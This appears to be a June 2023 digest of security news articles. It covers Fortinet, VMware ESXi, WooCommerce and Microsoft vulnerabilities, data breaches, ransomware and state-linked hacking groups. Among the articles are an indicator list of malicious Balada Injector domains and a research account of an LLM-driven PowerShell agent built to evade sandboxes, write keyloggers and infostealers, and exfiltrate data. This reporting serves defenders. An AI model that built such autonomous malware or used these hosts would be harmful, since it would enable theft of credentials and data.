Fortinet addressed a new critical flaw, tracked as CVE-2023-27997, in FortiOS and FortiProxy that is likely exploited in a limited number of attacks.
Fortinet has finally published an official advisory about the critical vulnerability, tracked as CVE-2023-27997 (CVSS score: 9.2), impacting FortiOS and FortiProxy.
“A heap-based buffer overflow vulnerability [CWE-122] in FortiOS and FortiProxy SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.” reads the advisory.
The vulnerability is a heap-based buffer overflow issue and according to the vendor it may have been exploited in a limited number of attacks aimed at government, manufacturing, and critical infrastructure sectors.
“Our investigation found that one issue (FG-IR-23-097) may have been exploited in a limited number of cases and we are working closely with customers to monitor the situation.” states the report published by Fortinet. “For this reason, if the customer has SSL-VPN enabled, Fortinet is advising customers to take immediate action to upgrade to the most recent firmware release. If the customer is not operating SSL-VPN the risk of this issue is mitigated – however, Fortinet still recommends upgrading.”
A remote attacker can trigger the vulnerability to execute arbitrary code or commands by sending specifically crafted requests to vulnerable devices.
The vulnerability was reported to Fortinet by the researcher Charles Fol and Dany Bach (DDXhunter) from Lexfo Security. The researcher describes the issue as a reachable pre-authentication that impacts every SSL VPN appliance.
The issue impacts at least:
FortiOS-6K7K version 7.0.10 FortiOS-6K7K version 7.0.5 FortiOS-6K7K version 6.4.12 FortiOS-6K7K version 6.4.10 FortiOS-6K7K version 6.4.8 FortiOS-6K7K version 6.4.6 FortiOS-6K7K version 6.4.2 FortiOS-6K7K version 6.2.9 through 6.2.13 FortiOS-6K7K version 6.2.6 through 6.2.7 FortiOS-6K7K version 6.2.4 FortiOS-6K7K version 6.0.12 through 6.0.16 FortiOS-6K7K version 6.0.10 At least FortiProxy version 7.2.0 through 7.2.3 FortiProxy version 7.0.0 through 7.0.9 FortiProxy version 2.0.0 through 2.0.12 FortiProxy 1.2 all versions FortiProxy 1.1 all versions At least FortiOS version 7.2.0 through 7.2.4 FortiOS version 7.0.0 through 7.0.11 FortiOS version 6.4.0 through 6.4.12 FortiOS version 6.2.0 through 6.2.13 FortiOS version 6.0.0 through 6.0.16
The company is not explicitly linking the FG-IR-23-097 to the Volt Typhoon campaign, however, Fortinet believes that all threat actors, including the Volt Typhoon APT, can start exploiting the above issue.
Fortinet urges customers to immediately patch their installs.
Below are the actions recommended by the company:
Review your systems for evidence of exploit of previous vulnerabilities e.g. FG-IR-22-377 / CVE-2022-40684
Maintain good cyber hygiene and follow vendor patching recommendations
A database containing the personal information of more than 8.9 million Zacks Investment Research users was leaked on a cybercrime forum.
A database containing personal information of 8,929,503 Zacks Investment Research users emerged on a popular hacking forum on June 10, 2023.
Zacks is the leading investment research firm focusing on stock research, analysis, and recommendations.
The availability of the archive was reported by the data breach notification service Have I Been Pwned, which notified Zecks. According to HIBP, the records in the database contain names, addresses, phone numbers, email addresses, usernames, and passwords stored as unsalted SHA-256 hashes.
The company attempted to downplay the security breach by telling Have I Been Pwned that threat actors only had access to encrypted passwords.
In January, Zacks Investment Research (Zacks) disclosed a data breach, the company reported that the security incident may have affected the personal information of its 820,000 customers.
The company discovered the intrusion at the end of 2022, it believes the unauthorized access took place sometime between November 2021 and August 2022.
According to the notice, threat actors had access to an older database of customers who had signed up for the Zacks Elite product between November 1999 through February 2005.
At the time, the company added that it had no evidence that financial data has been exposed due to the security incident.
“In December 2022, the investment research company Zacks announced a data breach. The following month, reports emerged of the incident impacting 820k customers. However, in June 2023, a corpus of data with almost 9M Zacks customers appeared before being broadly circulated on a popular hacking forum. The most recent data was dated May 2020 and included names, usernames, email and physical addresses, phone numbers and passwords stored as unsalted SHA-256 hashes.” reported HIBP. “On disclosure of the larger breach, Zacks advised that in addition to their original report “the unauthorised third parties also gained access to encrypted [sic] passwords of zacks.com customers, but only in the encrypted [sic] format”.”
The company also had reset the password of compromised accounts in response to the security breach.
HIBP pointed out that the most recent record in the leaked database is dated May 2020.
Impacted customers should also change the password for all other online accounts for which they used the same credentials as their Zacks account. Customers are also recommended to monitor financial accounts and consumer credit reports.
The availability of the database in the cybercrime ecosystem poses a severe risk for the company users.
St. Margaret’s Health in Illinois is partly closing operations at its hospitals due to a 2021 ransomware attack that impacted its payment system.
In February 2021a ransomware attack hit the St. Margaret’s Health in Illinois and forced the organization to shutdown of IT infrastructure at the Spring Valley hospital to contain the threat.
The cyber attack did not impact the Peru branch because it relies on a separate infrastructure
The payment system was taken offline for months, which caused delays in the billing of medical treatments for the patients with a significant economic impact on the healthcare organization.
Suzanne Stahl, the chair of SMP Health, the hospital’s parent organization, explained that the closure of the hospital was planned last year due to multiple factors, including the impact of COVID-19 pandemic.
“Due to a number of factors, such as the Covid-19 pandemic, the cyberattack on the computer system of St. Margaret’s Health, and a shortage of staff, it has become impossible to sustain our ministry,” Suzanne Stahl said in a video on Facebook.
On June 16, St. Margaret’s Health will close the Peru branch and the Spring Valley facility.
Suzanne Stahl also added that OSF HealthCare intends to purchase the hospital in Peru.
The closure of the hospital will have a dramatic impact on residents, especially those that are receiving medical treatment. The residents will be forced travel more than an hour to reach another hospital with an emergency room. Imagine what can happen in case of an heart attack.
“The hospital closure will have a profound impact on the well-being of our community. This will be a challenging transition for many residents who rely on our hospital for quality healthcare,” said Spring Valley’s mayor, Melanie Malooley-Thompson.
St. Margaret’s Health is the first hospital to cite a cyberattack as a reason for the ceasing of its activity, reported NBC News.
“There are countless examples of small businesses that have gone bankrupt following ransomware attacks as they were unable to restore their systems or afford to pay to get back up and running,” Errol Weiss, the chief security officer for Health-ISAC, a nonprofit group that shares cyberthreat information with hospitals, said in an email. “It’s tragic that we can now count a hospital in this statistic.”
Microsoft Patch Tuesday security updates for June 2023 fixed 69 flaws in its products, including six critical issues.
Microsoft Patch Tuesday security updates for June 2023 fixed 69 vulnerabilities in multiple products, including Microsoft Windows and Windows Components; Office and Office Components; Exchange Server; Microsoft Edge (Chromium-based); SharePoint Server; .NET and Visual Studio; Microsoft Teams; Azure DevOps; Microsoft Dynamics; and the Remote Desktop Client.
Six out of 69 vulnerabilities addressed by Microsoft are rated Critical, 62 are rated Important, and one is rated Moderate in severity. None of the vulnerabilities have been publicly known or exploited in the wild.
Five of these vulnerabilities were submitted through the ZDI program.
Below are the descriptions of some of the most interesting issues addressed by Microsoft:
A remote, unauthenticated attacker can trigger these vulnerabilities to execute arbitrary code on a vulnerable system where the message queuing service is running in a Pragmatic General Multicast (PGM) Server environment. Pragmatic General Multicast (PGM) is a reliable multicast computer network transport protocol. It is important to highlight that PGM is not enabled by default.
CVE-2023-32021 (CVSS 7.1) – Microsoft Exchange Server Remote Code Execution Vulnerability.
The issue is a remote code execution bug in Microsoft Exchange Server that can be exploited by an attacker to bypass issues that were previously exploited in the wild. A remote attacker can exploit this flaw to execute arbitrary code with SYSTEM privileges.
CVE-2023-3079 – Chromium: CVE-2023-3079 Type Confusion in V8
This vulnerability is a type confusion bug in Chrome that could lead to code execution at the level of the logged-on user. This flaw was first discovered by the Chrome team on June 1 and is actively exploited in malware attacks.
The full list of vulnerabilities fixed by Microsoft with the release of Patch Tuesday security updates for June 2023 is available here.
Malware researchers analyzed the application of Large Language Models (LLM) to malware automation investigating future abuse in autonomous threats.
Executive Summary
In this report we shared some insight that emerged during our exploratory research, and proof of concept, on the application of Large Language Models to malware automation, investigating how a potential new kind of autonomous threats would look like in the near future.
We explored a potential architecture of an autonomous malware threat based on four main steps: an AI-empowered reconnaissances, reasoning and planning phase, and the AI-assisted execution.
We demonstrate the feasibility of using LLM to recognize infected environments and decide which kind of malicious actions could be best suited for the environment.
We adopted an iterative code generation approach to leverage LLMs in the complicated task of generating code on the fly to achieve the malicious objectives of the malware agent.
Luckily, current general purpose LLM models still have limitations: while incredibly competent, they still need precise instruction to achieve the best results.
This new kind of threat has the potential to become extremely dangerous in the future, when computational requirements of LLMs would be low enough to run the agent completely locally, and also with the usage of specific models instead of general purpose ones.
Introduction
Large Language Models started shaping the digital world around us, since the public launch of OpenAI’s ChatGPT everybody spotted a glimpse of a new era where the Large Language Models (LLMs) would profoundly impact multiple sectors soon.
The cyber security industry is not an exception, rather it could be one of the most fertile grounds for such technologies, both for good and also for bad. Researchers in the industry have just scratched the surface of this application, for instance with read teaming application, as in the case of the PentestGPT project, but also, more recently even with malware related applications, in fact, Juniper researchers were using ChatGPT to generate malicious code to demonstrate the speedup in malware writing, and CyberArk’s ones tried to use ChatGPT to realize a polymorphic malware, along with Hays researchers which created another polymorphic AI-powered malware in Python.
Following this trail of this research, we decided to experiment with LLMs in a slightly different manner: our objective was to see if such technology could lead even to a paradigm-shift in the way we see malware and attackers. To do so, we prototyped a sort of “malicious agent” completely written in Powershell, that would be able not only to generate evasive polymorphic code, but also to take some degree of decision based on the context and its “intents”.
Technical Analysis
This is an uncommon threat research article, here the focus is not in a real-world threat actor, instead we deepen an approach that could be likely adopted in the near future by a whole new class of malicious actors, the AI-powered autonomous threat.
A model for Autonomous Threats
First of all we are going to describe a general architecture that could be adopted for such an objective. An architecture which inevitably has common ground with Task-Driven Autonomous Agents like babyAGI or autoGPT. But for the sake of our experimentation, we decided to shape the logic flow of the malicious agent to better match common malware operations.
As anticipated before, our Proof of Concept (PoC) autonomous malware is an AI-enabled Powershell script, designed to illustrate the potential of artificial intelligence in automation and decision-making, with each phase of execution highlighting the adaptability and intelligence of the AI.
Breaking down the state diagram, at high level, the agent runs into the following stages.
Footprinting
During the discovery phase, the AI conducts a comprehensive analysis of the system. Its goal is to create a thorough profile of the operating environment. It examines system properties such as the operating system, installed applications, network setups, and other pertinent information.
This thorough assessment is not just for ensuring the system is ready to go, but also assists the AI in figuring out if it’s working within a controlled environment, whether it’s interacting with a server or a client. One of the crucial determinations it makes is whether it is functioning within a sandboxed environment. Sandboxes are controlled settings, often used for testing or monitoring potentially harmful activities. If the AI detects it is operating within a sandbox, it halts all execution, avoiding unnecessary exposure in a non-targeted environment.
This system data becomes a vital input that lets the malicious-AI make informed decisions and respond appropriately. It provides a comprehensive understanding of its operating environment, similar to a detailed map, allowing it to navigate the system effectively. In this sense, this phase readies the “malicious agent” for the activities that follow.
Reasoning
In the execution phase, the malicious agent maneuvers rely significantly on the context, built on a detailed understanding of the system environment gathered in the earlier analysis phase.
An intriguing aspect of this phase is the AI’s strategic decision-making, which closely emulates strategies used by well-known hacking groups. At the outset, the “malicious agent” mimics a specific, recognized hacking group. The selection of the group isn’t random but is determined by the particular context and conditions of the system.
After deciding which hacking group to mimic, the autonomous agent goes on to devise a comprehensive attack strategy. This strategy is custom-made to the specific system environment and the standard practices of the selected hacking group, for example, it may decide to include password stealing tasks in case it detects the Outlook application rather than install a backdoor account on the server.
Execution
Once the attack strategy is in place, the malicious agent begins to carry out each action in a step-by-step manner. For each action, the AI dynamically creates the necessary code and promptly puts it into action. This could include a broad range of operations, such as attempting privilege escalation, conducting password hunts, or establishing persistence.
However, the AI’s role isn’t just limited to implementation. It consistently keeps an eye on how the system responds to its actions and stays ready for unexpected occurrences. This attentiveness allows the AI to adapt and modify its actions in real time, showcasing its ability for resilience and strategic problem-solving within a changing system environment.
When guided by more specific prompts, AI proves to be exceptionally capable, even to the point of generating functional infostealers on the fly.
This AI-empowered PoC epitomizes the potential of AI in carrying out intricate tasks independently and adjusting to its environment.
Code Generation
One of the fundamental characteristics that set autonomous threats apart is their ability to generate code. Unlike traditional threats, which often require manual control or pre-programmed scripts to adapt and evolve, autonomous threats use AI algorithms to autonomously generate new code segments. This dynamic code generation ability not only allows them to adapt to changing system conditions and defenses but also makes their detection and analysis more challenging.
This process involves the use of specific prompts, allowing the AI to create custom solutions that suit the system’s unique conditions. The AI also takes an active role in monitoring the outcomes of its actions. It continually assesses the results of its code execution. If it detects errors or unsuccessful actions, it uses them as inputs for further processing. By feeding error data back into its processes, the AI can refine and optimize its code generation. This iterative process represents a significant step towards true autonomous problem-solving capabilities, as the AI dynamically adjusts its actions based on their results.
Figure. Iterative code generation and adjustment
Environment Awareness
Autonomous threats take threat intelligence to a new level by being aware of their operating environment. Traditional threats often have a one-size-fits-all approach, attacking systems without fully understanding the environment. In contrast, autonomous threats can actively monitor their environment and adapt their actions accordingly.
The concept of environmental awareness is pivotal in AI-powered cyber threats. This environmental understanding enables the autonomous malware to choose an appropriate course of action based on the context around. For example, it might identify if it’s operating within a sandbox environment or decide to behave differently based on whether it’s operating on a server or client machine.
This awareness also influences the AI’s decision-making process during its operation. It can adjust its behavior according to the context, impersonating a particular known hacker group or choosing a specific attack strategy based on the evaluated system characteristics.
This environment-aware approach could enable malware writers to rely on very sophisticated, and harder to counter, evasion schemes.
Figure. Prompt to evaluate the machine environment
Decision-Making Autonomy
Perhaps the most defining characteristic of autonomous malware is the decision-making autonomy. Unlike traditional threats that rely on pre-programmed behaviors or external control from a human operator, autonomous threats can make independent decisions about their actions.
These threats use advanced AI algorithms to analyze the available information, weigh the potential outcomes of different actions, and choose the most effective course of action. This decision-making process could involve choosing which systems to target, selecting the best method for attack, deciding when to lay dormant to avoid detection, and even determining when to delete themselves to avoid traceability.
This level of autonomy not only makes these threats more resilient to countermeasures, but it also allows them to carry out more complex and coordinated attacks. By making independent decisions, these threats can adapt to changing circumstances, carry out long-term infiltration strategies, and even coordinate with other autonomous threats to achieve their objectives.
Proof of Concept
In this proof of concept (PoC), we launched our AI-enabled script on a Windows client. The script’s execution process is designed to illustrate the potential of AI in automating complex tasks, decision making, and adjusting to the environment.
Firstly, the script initiates with an exhaustive system footprinting. During this phase, the AI takes a thorough survey of the system. The focus is on creating a detailed footprint of the operating environment by examining properties such as the operating system, installed software and other relevant details. This rigorous assessment not only prepares the system for the following actions but also helps the AI understand the context it’s operating within.
Simultaneously, a crucial part of this initial phase is sandbox detection. In fact, if the AI identifies the environment as a sandbox, the execution halts immediately.
Once the AI has confirmed it’s not within a sandbox, and it’s dealing with a client, it proceeds to develop an infostealer — a type of malware that’s designed to gather and extract sensitive information from the system. In this specific case, the AI installs a keylogger to monitor and record keystrokes, providing a reliable method to capture user inputs, including passwords.
Alongside keylogging, during the test sessions, the AI performed password hunting too.
Finally, after gathering all the necessary data, the AI proceeded to the data exfiltration. The AI prepares all the accumulated data for extraction, ensuring it’s formatted and secured in a way that it can be efficiently and safely retrieved from the system.
The demonstration video provides a real-time view of these actions carried out by the AI.
This PoC underlines how an AI system can perform complex tasks, adapt to its environment, and carry out activities that previously required advanced knowledge and manual interaction.
Consideration on Experimentation Session
In all the experiments conducted, a key theme that emerged was the level of exactness needed when assigning tasks to the AI. When presented with vague or wide-ranging tasks, the AI’s output frequently lacked effectiveness and specificity. This highlights an essential trait of AI at its current stage: while incredibly competent, it still needs precise instruction to achieve the best results.
For instance, when tasked to create a generic malicious script, the AI might generate code that tries to cover a wide spectrum of harmful activities. The outcome could be a piece of code that is wide-ranging and inefficient, potentially even drawing unwanted scrutiny due to its excessive system activity.
On the other hand, when given more narrowly defined tasks, the AI demonstrated the capability to create specific components of malware. By steering the AI through smaller, more exact tasks, we could create malicious scripts that were more focused and effective. Each component could be custom-made to carry out its task with a high level of effectiveness, leading to the creation of a cohesive, efficient malware when combined.
This discovery suggests a more efficient method of utilizing AI in cybersecurity — breaking down complex tasks into smaller, manageable objectives. This modular approach allows for the creation of specific code pieces that carry out designated functions effectively and can be assembled into a larger whole.
Conclusion
In conclusion, when we just look in the direction of LLMs and malware combined together, we clearly see a significant evolution in cybersecurity threats, potentially able to lead to a paradigm shift where malicious code operates based on predefined high-level intents.
Their ability to generate code, understand their environment, and make autonomous decisions makes them a formidable challenge for future cybersecurity defenses. However, by understanding these characteristics, we can start to develop effective strategies and technologies to counter these emerging threats.
Luckily, the autonomous malware PoC we set up and the potential upcoming ones have still limitations: they rely on generic language models hosted online, this mean the internet connectivity is, and will be, a requirement for at least some time. But, we are likely going to see the adoption of local LLM models, maybe even special-purpose ones, directly embedded in the future malicious agents.
AI technology is in a rapid-development stage, and even if it is pretty young, its adoption across various sectors is widening, including in the criminal underground.
A China-linked APT group tracked as UNC3886 has been spotted exploiting a VMware ESXi zero-day vulnerability.
Mandiant researchers observed a China-linked cyberespionage group, tracked as UNC3886, exploiting a VMware ESXi zero-day vulnerability tracked as CVE-2023-20867.
“VMware Tools contains an Authentication Bypass vulnerability in the vgauth module.” reads the advisory published by VMware. “A fully compromised ESXi host can force VMware Tools to fail to authenticate host-to-guest operations, impacting the confidentiality and integrity of the guest virtual machine.”
Researchers from Mandiant first detailed the activity of the group in September 2022 when they discovered a novel malware persistence technique within VMware ESXi Hypervisors.
The technique was used by malware authors to achieve administrative access within VMware ESXi Hypervisors and take over vCenter servers and virtual machines for Windows and Linux.
The highly targeted and evasive nature of this attack leads the experts into believing that the attack was carried out for cyberespionage purposes by a China-linked actor tracked as UNC3886.
In the attack investigated by Mandiant in September 2022, threat actors relied on malicious vSphere Installation Bundles (“VIBs”) to install two backdoors on the ESXi hypervisors, tracked as VIRTUALPITA and VIRTUALPIE. VIBs are collections of files that are designed to manage virtual systems, they can be used to create startup tasks, custom firewall rules, or deploy custom binaries upon the restart of an ESXi machine.
Further investigation conducted by Mandiant revealed additional techniques used by the group UNC3886 used to target multiple organizations avoiding EDR solutions.
The cyberespionage group was observed harvesting credentials for service accounts from a vCenter Server for all connected ESXi hosts from the embedded vPostgreSQL server built into vCenter Server Appliance. The threat actors are exploiting the zero-day vulnerability CVE-2023-20867 to execute privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs without authentication of guest credentials from a compromised ESXi host and no default logging on guest VMs.
The CVE-2023-20867 flaw is exclusively exploitable by an attacker with root access to the ESXi server.
Then the attackers deploy backdoors on ESXi hosts using an alternative socket address family, use VMCI, for lateral movement and maintain persistence.
In recent attacks, Chinese hackers were also spotted modifying and disabling logging services on compromised systems.
“Mandiant previously noted in 2022 that it did not identify evidence of a CVE being exploited during past investigations. As investigations into UNC3886 activity continued in 2023, Mandiant discovered that the attacker utilized a zero-day vulnerability, CVE-2023-20867, to execute commands and transfer files to and from guest VMs from a compromised ESXi host without the need for guest credentials.” reads the analysis published by Mandiant. “Additionally, the use of CVE-2023-20867 does not generate an authentication log event on the guest VM when commands are executed from the ESXi host.”
Mandiant observed the group UNC3886 using of multiple VMCI backdoors deployed as malicious VIBs on ESXi hosts.
Once the attackers opened a communication channel between guest and host they were able to use new means of persistence to regain access to a backdoored ESXi host as long as a backdoor is deployed and the attacker gains initial access to any guest machine.
Then the malware can bypass network segmentation needed to access the ESXi host and most security reviews for open listening ports and odd NetFlow behavior.
“UNC3886 continues to target devices and platforms that traditionally lack EDR solutions and make use of zero-day exploits on those platforms. UNC3886 continues to present challenges to investigators by disabling and tampering with logging services, selectively removing log events related to their activity.” concludes the report. “The threat actors’ retroactive cleanup performed within days of past public disclosures on their activity indicates how vigilant they are.”
Learn the shocking truth behind the Balada Injector campaign and find out how to protect your organization from this relentless viral invasion.
A deadly cyber campaign has been working silently to undermine website security by exploiting popular WordPress plugins — infiltrating over a million websites and leaving administrators scrambling for solutions.
In April 2023, Bleeping Computer and other tech outlets like TechRadar began circulating reports of cybercriminals successfully hacking WordPress websites. They were able to gain access via a toxic combination of the popular plugins Elementor Pro Premium (Webpage builder) and WooCommerce (Online storefront).
Initially attributed to security researcher Jerome Braundet of the Ninja Tech Network, this recently disclosed vulnerability produces a base 8.8 CVSS score (High), giving WordPress administrators and cybersecurity teams much to fret over.
As of May 2023, an official CVE designation is still pending. Websites running Elementor Pro 3.11.6 or earlier, alongside an activated WooCommerce plugin, are advised to upgrade ElementorPro to at least 3.11.7 or face the risk of authenticated users (think of standard e-commerce customers) achieving total control of websites by exploiting Broken Access Control — the most severe of OWASP’s Top 10 risks.
While reports of this vulnerability have circulated wildly across the interwebs, a lesser-known but directly related set of ‘hack-tivities’ has been occurring on a similar front against these and other standard WordPress plugins.
This article will focus on the widespread and highly persistent malware injector campaign “Balada,” which has reportedly infected over 1 million individual websites by exploiting weaknesses in Elementor Pro, WooCommerce, and several other WordPress plugins. This article will provide a brief history of the Balada Injector, its common objectives, common Indicators of Compromise (IoC), and a quick exploitation overview, including some general tips that organizations should adopt to avoid being the next victim.
What is Balada?
Cybersecurity firm Sucuri has been tracking Balada Injector activity since 2017 but has only recently given this long-running campaign its name. Primarily leveraging functions written in the Go language, ‘Balada’, which translates to ‘Ballad’ in several languages, achieves initial infection through commonly known but unpatched WordPress plugins, themes, or other software vulnerabilities.
Balada then attempts to spread itself and maintain persistence by executing a series of rehearsed attacks, cross-site infections, and installation of backdoors, living up to its namesake. The Elementor Pro and WooCommerce compromise path allows authenticated users to modify WordPress configurations to create administrator accounts or inject URL redirects into website pages or posts. The malware then uses a kleptomaniacal scheme to harvest database credentials, archive files, log data, or valuable documents that aren’t adequately secured, while establishing numerous Command and Control (C2) channels for persistence.
Balada is not an overly shy malware campaign. Sucuri notes that injection activities follow a defined monthly schedule that generally starts on the weekend and ends around mid-week on a predictable cycle.
Balada favors exploiting Linux-based hosts, but Microsoft-based web servers like IIS are not immune. Adhering to practices seen in other contemporary malware campaigns, Balada leverages newly-registered domains consisting of random, unrelated words to entice clicks and user redirection to websites that deliver malicious payloads.
These websites will often take the guise of fake IT Support services, cash prize notifications, or even security verification services like CAPTCHAs. The below infographic summarizes the initial attack vectors that Balada will seek to exploit, services or plugins it attempts to abuse, and some of its more recognized persistence vectors. Defensive measures will be summarized towards the end of the article, as Balada is notoriously difficult to remove once it has embedded itself.
Basic Balada Injector workflow and capabilities against a WordPress CMS.
Identifying Balada injections
Sucuri’s research further established that Balada’s primary malware routine is typically located in the following path on compromised victim devices “C:/Users/host/Desktop/balada/client/main.go”. A semi-maintained Virus Total collection highlights common file hashes, URLs, and other indicators associated with Balada-delivered malware and its infections.
Balada also leverages a dated but recurring User-Agent “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36” which has been observed by Sucuri repeatedly in compromised machine logs starting in late 2020 and well into the current period. Balada activity has been associated with well over 100 unique domains since 2017. Balada leverages a “main.ex_domains”function to store and reuse domains for future attacks as successful infection or compromise occurs in monthly campaigns.
The below table highlights a small portion of the common domains observed in recently analyzed injector campaigns. Sucrui was contacted for comment in May 2023 to determine if an APT group was attributed to these attacks, with no formal response issued.
cdn.statisticline[.]com/scripts/sway.js
actraffic[.]com
importraffic[.]com
collectfasttracks[.]com
followmyfirstone[.]com
digestcolect[.]com
primarylocationgo[.]com
starttrafficc[.]com
buyittraffic[.]com
cutttraffic[.]com
dexterfortune[.]com
jockersunface[.]com
destinyfernandi[.]com
requestfor4[.]com
balanceforsun[.]com
Exploitation walkthrough
The following section will highlight a high-level walkthrough demonstrating how a WordPress installation that leverages the vulnerable versions of Elementor Pro and WooCommerce can be exploited. The demonstration can be recreated on a Kali Linux VM, with a Bitnami WordPress Docker container running inside of Kali. It is not advised that readers attempt to recreate these conditions, attempt to download and use known vulnerable software in any capacity, or attempt these exploitation techniques against systems not owned by the reader. Proceed at your own risk!
Unauthenticated users can leverage the vulnerability by simply registering for a WooCommerce user account then querying the backend AJAX action as such:
After updating values such as “siteurl,” SQL queries can be generated to determine the destination specified and whether autoload is enabled. Certain web application firewalls (WAF) will purportedly provide adequate protections against exploitation but an upgrade from Elementor is suggested immediately if version 3.11.6 is in use.
Defensive control considerations
So far, the article has covered how Balada seeks to achieve an initial compromise, the specific types of files and information it deems proper, and some common infection techniques. Organizations can consider some of the guidance below to help them prevent Balada infection or determine when infections may occur.
Some advice is self-evident, like ensuring web server hosts, website plugins, themes, or related software remain current and up to date. Some are less obvious, such as ensuring sound DNS security through solutions like Cisco Umbrella or DNSFilter. These capabilities exist to provide network-level or roaming client solutions that identify, then block redirection attempts and DNS requests to known malicious sites. Organizations should also enforce a strong password policy (complexity, 16+ characters, etc.), privileged users must satisfy multifactor authentication or other conditional access policies, and creating privileged accounts should generate alerts to appropriate teams. Organizations should also strongly consider implementing or routinely assessing the following:
Routinely audit necessary plugins, themes or software strictly necessary for web application operations. Remove all unnecessary or unused software.
Conduct internal and routine penetration testing or similar assessments against web applications to identify exploitable weaknesses before Balada does.
Enable File Integrity Monitoring (FIM) against critical system files.
Heavily restrict access to sensitive files like wp-config, website backup data, log files or database archives and ensure strong data retention policies purge older versions of this data when no longer needed.
Disable unnecessary or insecure server services and protocols like FTP.
Subscribe to security alerts via US CISA, MS-ISAC or other reputable threat intelligence services to learn about critical software and system vulnerabilities.
If you want to read the summary give a look at the original post at
Hundreds of thousands of online stores are potentially exposed to hacking due to a critical vulnerability in the WooCommerce Stripe Payment Gateway plugin.
The Stripe plugin extends WooCommerce allowing administrators of the e-commerce sites to take payments directly on their store via Stripe’s API.
Stripe is a simple way to accept payments online, it supports Visa, MasterCard, American Express, Discover, JCB, and Diners Club cards, even Bitcoin payment channels.
The plugin is very popular and has more than 900,000 active installations.
A security flaw has been uncovered in the WooCommerce Stripe Gateway WordPress plugin that could lead to the unauthorized disclosure of sensitive information.
The vulnerability is an unauthenticated Insecure direct object references (IDOR) issue that impacts versions 7.4.0 and below. An attacker can exploit the vulnerability to bypass authorization and access sensitive information.
“This plugin suffers from an Unauthenticated Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability allows any unauthenticated user to view any WooCommnerce order’s PII data including email, user’s name, and full address.” reads the advisory published by securityfirm PatchStack. “The described vulnerability was fixed in version 7.4.1 with some backported fixed version and assigned CVE-2023-34000.”
The issue resides in the javascript_params function and the way order objects are managed, specifically, the experts noticed that there is no proper control to access ‘javascript_params‘ and ‘payment_fields‘ functions.
“Notice that the code will fetch an order object to $order variable using the $order_id variable. The $order_id variable is constructed from $wp->query_vars[‘order-pay’]. According to the query_vars documentation, this hook could be used to fetch parameter from the GET parameters. The code then will construct a $stripe_params variable with details from the $order object such as user’s full name and full address.” continues the advsory. “There is no orders ownership check on the rest of the function code and the function will return $order as an object. When traced, the javascript_params variable could be called from the payment_scripts function”
The experts noticed that the issue was addressed by implementing the validation of the fetched order ownership. The check is implemented through the is_valid_pay_for_order_endpoint function which will check the order based on the key and ownership.
Below is the disclosure timeline for the above issue:
17 April 2023 – We found the vulnerability and reached out to the plugin vendor. 30 May 2023 – WooCommerce Stripe Gateway version 7.4.1 was published to patch the reported issues. 13 June 2023 – Added the vulnerabilities to the Patchstack vulnerability database. 13 June 2023 – Published the article.
Microsoft linked a series of wiping attacks to a Russia-linked APT group, tracked as Cadet Blizzard, that is under the control of the GRU.
Microsoft attributes the operations carried out by the Russia-linked APT group tracked as Cadet Blizzard to the Russian General Staff Main Intelligence Directorate (GRU). The IT giant pointed out that Cadet Blizzard is distinct from other known APT groups operating under the control of the Russian military intelligence GRU, such as Forest Blizzard (STRONTIUM) and Seashell Blizzard (IRIDIUM).
Unlike other Russia-linked APT group, CadetBlizzard operations are extremely disruptive.
The Microsoft Threat Intelligence Center (MSTIC) initially tracked Cadet Blizzard as DEV-0586, the group was observed conducting destructive malware attacks against multiple organizations in Ukraine in January 2022.
The activity of the group was spotted a month before the invasion of Ukraine, Cadet Blizzard is the group that created and deployed the WhisperGate wiper. The group was also observed defacing the website of several Ukrainian organizations.
Microsoft believes that the group has been active since at least 2020, it focused on government services, law enforcement, non-profit/non-governmental organizations, IT service providers/consulting, and emergency services in Ukraine.
“Cadet Blizzard is a Russian GRU-sponsored threat group that Microsoft began tracking following disruptive and destructive events occurring at multiple government agencies in Ukraine in mid-January 2022.” reads the report published by Microsoft. “Cadet Blizzard compromises and maintains a foothold on affected networks for months, often exfiltrating data prior to disruptive actions. Microsoft observed Cadet Blizzard’s activity peak between January and June 2022, followed by an extended period of reduced activity.”
Micorosft observed a new surge in the activity of the group in January 2023, when the APT conducted multiple operations against entities in Ukraine and in Europe. The researcher noticed that the APT group is active seven days of the week and conducted their operations during their primary European targets’ off-business hours. The researchers warn that the APT group may target NATO member states supporting the military operations of the Ukrainian government.
Microsoft provided indicators of compromise to investigate environments and assess for potential compromise.
The LockBit ransomware group successfully extorted roughly $91 million from approximately 1,700 U.S. organizations since 2020.
According to a joint advisory published by cybersecurity agencies, the LockBit ransomware group has successfully extorted roughly $91 million in about 1,700 attacks against U.S. organizations since 2020.
The advisory was published by Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the following international agencies:
Australian Cyber Security Centre (ACSC)
Canadian Centre for Cyber Security (CCCS)
United Kingdom’s National Cyber Security Centre (NCSC-UK)
National Cybersecurity Agency of France (ANSSI)
Germany’s Federal Office for Information Security (BSI)
New Zealand’s Computer Emergency Response Team (CERT NZ) and National Cyber Security Centre (NCSC NZ)
With U.S. & international partners, we published a joint advisory on LockBit Ransomware: https://t.co/q8zAaaue6h
— Cybersecurity and Infrastructure Security Agency (@CISAgov) June 14, 2023
The LockBit ransomware operation was the most active in 2022 and according to the researchers it is one of the most prolific RaaS in 2023. The operation targeted many organizations in critical infrastructure sectors, including financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The advisory highlights that due to the large number of unconnected affiliates in RaaS, the TTPs observed in the LockBit ransomware attacks have a significant variance.
Lockbit was responsible for 18% of the total reported Australian ransomware incidents from April 1, 2022, to March 31, 2023.
16% of the State, Local, Tribal, and Tribunal (SLTT) government ransomware incidents reported to the MS-ISAC is 2022 were LockBit attacks. The group targeted municipal governments, county governments, public higher education and K-12 schools, and emergency services (e.g., law enforcement).
According to the French ANSSI cybersecurity agency, LockBit 3.0 was the prevalent variant in 2023. The agency also observed two cases where victims were infected with as many as three different strains of LockBit (LockBit 2.0/Red, LockBit 3.0/Black, and LockBit Green)
Cybersecurity agencies monitored data leak sites to record the victims of the operation, however, these darkweb sites only show the portion of LockBit affiliates’ victims subjected to secondary extortion.
